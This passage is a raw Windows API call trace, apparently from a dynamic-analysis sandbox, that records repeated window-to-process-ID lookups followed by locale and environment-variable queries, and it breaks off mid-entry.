hWnd=0x1007e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.336] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.336] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.337] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.337] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x458 [0099.337] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.337] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.337] GetWindowThreadProcessId (in: hWnd=0xa00a6, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.337] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x9b8 [0099.337] GetWindowThreadProcessId (in: hWnd=0x400ca, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.337] GetWindowThreadProcessId (in: hWnd=0x400ac, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.337] GetWindowThreadProcessId (in: hWnd=0x500d4, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.337] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.338] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.338] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.338] GetWindowThreadProcessId (in: hWnd=0x500b0, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.338] GetWindowThreadProcessId (in: hWnd=0x1025c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x9a8 [0099.338] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x998 [0099.338] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x988 [0099.338] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x978 [0099.338] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x968 [0099.338] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x958 [0099.338] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x948 [0099.339] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x938 [0099.339] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x928 [0099.339] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x918 [0099.339] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x908 [0099.339] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8f8 [0099.339] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8e8 [0099.339] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8d8 [0099.339] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8c8 [0099.339] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8b8 [0099.340] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8a8 [0099.340] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x898 [0099.340] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x888 [0099.340] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x878 [0099.340] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x868 [0099.340] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x858 [0099.340] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x848 [0099.340] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x838 [0099.340] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x828 [0099.340] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x818 [0099.341] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x808 [0099.341] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x598 [0099.341] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x344 [0099.341] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x60c [0099.341] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7e0 [0099.341] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x25c [0099.341] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x674 [0099.341] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x634 [0099.341] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x270 [0099.342] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x34c [0099.342] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x324 [0099.342] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x244 [0099.342] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x180 [0099.342] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x6ec [0099.342] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7e4 [0099.342] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7ec [0099.342] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x570 [0099.342] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x640 [0099.343] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x5d4 [0099.343] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x518 [0099.343] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x500 [0099.343] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x664 [0099.343] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x410 [0099.343] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x694 [0099.343] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x704 [0099.343] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x248 [0099.343] GetWindowThreadProcessId (in: hWnd=0x4015a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x5ac [0099.343] GetWindowThreadProcessId (in: hWnd=0x20162, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x414 [0099.344] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7c8 [0099.344] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x15c [0099.344] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7bc [0099.344] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x2a8 [0099.344] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x23c [0099.344] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x560 [0099.344] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x564 [0099.344] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7b0 [0099.344] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x290 [0099.344] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x70c [0099.345] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4f0 [0099.345] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x514 [0099.345] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x50c [0099.345] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x514 [0099.345] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x50c [0099.345] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x514 [0099.345] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4f0 [0099.345] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4f0 [0099.345] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x58c [0099.345] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x578 [0099.345] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x458 [0099.346] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x530 [0099.346] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.346] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x508 [0099.346] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.346] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4f4 [0099.346] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.346] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.346] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x794 [0099.346] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.346] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.346] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x458 [0099.347] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x458 [0099.347] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x448 [0099.347] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x778 [0099.347] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x458 [0099.347] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x538 [0099.347] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.347] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4ac [0099.347] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x9b8 [0099.347] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x9a8 [0099.347] GetWindowThreadProcessId (in: hWnd=0x1025a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x998 [0099.347] GetWindowThreadProcessId (in: hWnd=0x10256, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x988 [0099.347] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x978 [0099.348] GetWindowThreadProcessId (in: hWnd=0x1024e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x968 [0099.348] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x958 [0099.348] GetWindowThreadProcessId (in: hWnd=0x10246, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x948 [0099.348] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x938 [0099.348] GetWindowThreadProcessId (in: hWnd=0x1023e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x928 [0099.348] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x918 [0099.348] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x908 [0099.348] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8f8 [0099.348] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8e8 [0099.348] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8d8 [0099.348] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8c8 [0099.349] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8b8 [0099.349] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x8a8 [0099.349] GetWindowThreadProcessId (in: hWnd=0x1021a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x898 [0099.349] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x888 [0099.349] GetWindowThreadProcessId (in: hWnd=0x10212, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x878 [0099.349] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x868 [0099.349] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x858 [0099.349] GetWindowThreadProcessId (in: hWnd=0x10206, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x848 [0099.349] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x838 [0099.349] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x828 [0099.349] GetWindowThreadProcessId (in: hWnd=0x101fa, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x818 [0099.350] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x808 [0099.350] GetWindowThreadProcessId (in: hWnd=0x101f2, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x598 [0099.350] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x344 [0099.350] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x60c [0099.350] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7e0 [0099.350] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x25c [0099.350] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x674 [0099.350] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x634 [0099.350] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x270 [0099.350] GetWindowThreadProcessId (in: hWnd=0x101d2, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x34c [0099.350] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x324 [0099.350] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x244 [0099.351] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x180 [0099.351] GetWindowThreadProcessId (in: hWnd=0x101c2, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x6ec [0099.351] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7e4 [0099.351] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7ec [0099.351] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x570 [0099.351] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x640 [0099.351] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x5d4 [0099.351] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x518 [0099.351] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x500 [0099.351] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x664 [0099.351] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x410 [0099.352] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x694 [0099.352] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x704 [0099.352] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x248 [0099.352] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x5ac [0099.352] GetWindowThreadProcessId (in: hWnd=0x2015c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x414 [0099.352] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7c8 [0099.352] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x15c [0099.352] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7bc [0099.352] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x2a8 [0099.352] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x23c [0099.352] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x560 [0099.353] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x564 [0099.353] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x7b0 [0099.353] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x290 [0099.353] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x70c [0099.353] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x50c [0099.353] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x514 [0099.353] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4f0 [0099.353] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x58c [0099.353] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x458 [0099.353] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x4f4 [0099.353] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x794 [0099.354] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x458 [0099.354] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1ad6c0 | out: lpdwProcessId=0x1ad6c0) returned 0x778 [0099.357] WerSetFlags () returned 0x0 [0099.364] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0099.364] CoTaskMemFree (pv=0x0) [0099.365] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ada28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ada20 | out: pulNumLanguages=0x1ada28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ada20) returned 1 [0099.365] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ada28, pwszLanguagesBuffer=0x2be3ae8, pcchLanguagesBuffer=0x1ada20 | out: pulNumLanguages=0x1ada28, pwszLanguagesBuffer=0x2be3ae8, pcchLanguagesBuffer=0x1ada20) returned 1 [0099.370] CoTaskMemAlloc (cb=0x24) returned 0x2cc0b0 [0099.370] GetUserDefaultLocaleName (in: lpLocaleName=0x2cc0b0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0099.370] CoTaskMemFree (pv=0x2cc0b0) [0099.391] CoTaskMemAlloc (cb=0x104) returned 0x2d1140 [0099.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1140, nSize=0x80 | out: lpBuffer="") returned 0x0 [0099.391] CoTaskMemFree (pv=0x2d1140) [0099.392] CoTaskMemAlloc (cb=0x104) 